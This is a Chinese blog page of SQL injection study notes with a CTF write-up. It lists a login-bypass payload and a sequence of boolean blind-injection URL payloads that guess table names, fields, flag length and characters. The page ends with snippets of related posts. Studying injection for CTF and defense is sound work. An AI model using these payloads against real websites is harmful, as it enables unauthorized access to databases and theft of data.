SQL注入學習

2022-09-17 05:06:09 字數 1116 閱讀 6616

2018-02-03

grant 授權語句

revoke 取消許可權

get 方式url的後面可以跟上?+query語句

post方式可以上傳檔案或表單

cookie 需要關注的注入點

構造語句

admin' or 1=1 --;

回顯 使用union聯合語句 正常可執行/ 不正常會報錯

不回顯的叫盲注

whale ctf

sql注入題wp

表單通過get方式傳輸

輸入1後  url?id=1

單引號是分割資料與命令的 成對出現

基本注入

1.爆破表名

?id =1 and exists(select * from flag) //猜測表名

?id =1 and exists(select * from news)

2.爆破字段

?id =1 and exists(select user from flag)

?id =1 and exists(select password from flag)

?id =1 and exists(select flag from flag)

3.已知表名、字段,判斷字段長度 大於、小於符號嘗試

?id =1 and (select length(flag) from flag)>5

?id =1 and (select length(flag) from flag)>10

?id =1 and (select length(flag) from flag)<10

4.猜解字段的ascii

SQL注入學習

通常情況下,可能存在 sql 注入漏洞的 url 是類似這種形式 對 sql 注入的判斷,主要有兩個方面 可能存在 sql 注入攻擊的 asp php jsp 動態網頁中,乙個動態網頁中可能只有乙個引數,有時可能有多個引數。有時是整型引數,有時是字串型引數,不能一概而論。總之只要是帶有引數的 動態網...

關於SQL注入學習

知道sql injection 但是平時懶的去做這方面的東西,以後一定還得注意 net的專案看來要用儲存過程和分層方式來寫了 sql injection 講解 方法 網上蒐集 1.帶引數的的儲存過程來完成使用者驗證的過程 2.使用者通過 提交過來的變數引數進行檢查的 發現客戶端提交的引數中有 exe...

SQL注入學習 檢測

例項1的鏈結為 注 每個人機器上的可能不太一樣 從url中可以看出,引數為字串 root 從表中返回一行資料,如下圖所示。為了理解伺服器端 我們需要對其進行探測。1.新增多餘字元。比如 1234 使用?name root1234,表中未顯示任何記錄。從這裡我們可以猜測,請求以某種匹配方式來使用我們的...